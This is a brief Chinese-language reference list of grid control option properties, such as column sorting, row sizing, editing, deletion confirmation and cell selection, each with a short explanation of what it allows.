BandHiding:是否显示带 BandMoving:是否允许拖动带 ColumnFiltering:是否允许列过滤 ColumnGrouping:是否允许列分组 ColumnHiding:列头是否隐藏 ColumnHorzSizing:是否允许调整列宽度 ColumnMoving:是否允许列拖动 ColumnSorting:是否允许列排序 ColumnVertSizing:是否允许调整列高度 DataRowSizing:是否允许调整数据行高度 GroupBySorting:是否允许组排序 GroupRowSizing:是否允许调整组行高度OptionData: 允许数据操作 Appending: 是否允许增加 CancelOnExit: 退出时是否自动取消修改 Deleting: 是否允许删除 DeletingConfirmation: 删除是否提示 Editing :是否允许编辑 Inserting: 是否允许插入 OptionsSelection: 单元格操作 CellMultiSelect:是否允许选择多单元格 CellSelect: 进入单元格是否选择 InvertSelect: 是否允许转换选择 MultiSelect: 是否允许多行选择 HideFocusRectOnExit: 移开是否隐藏焦点 UnselectFocusedRecordOnExit:移开是否允许取消焦点 OptionsView:表格选项
2023-06-28 05:32:551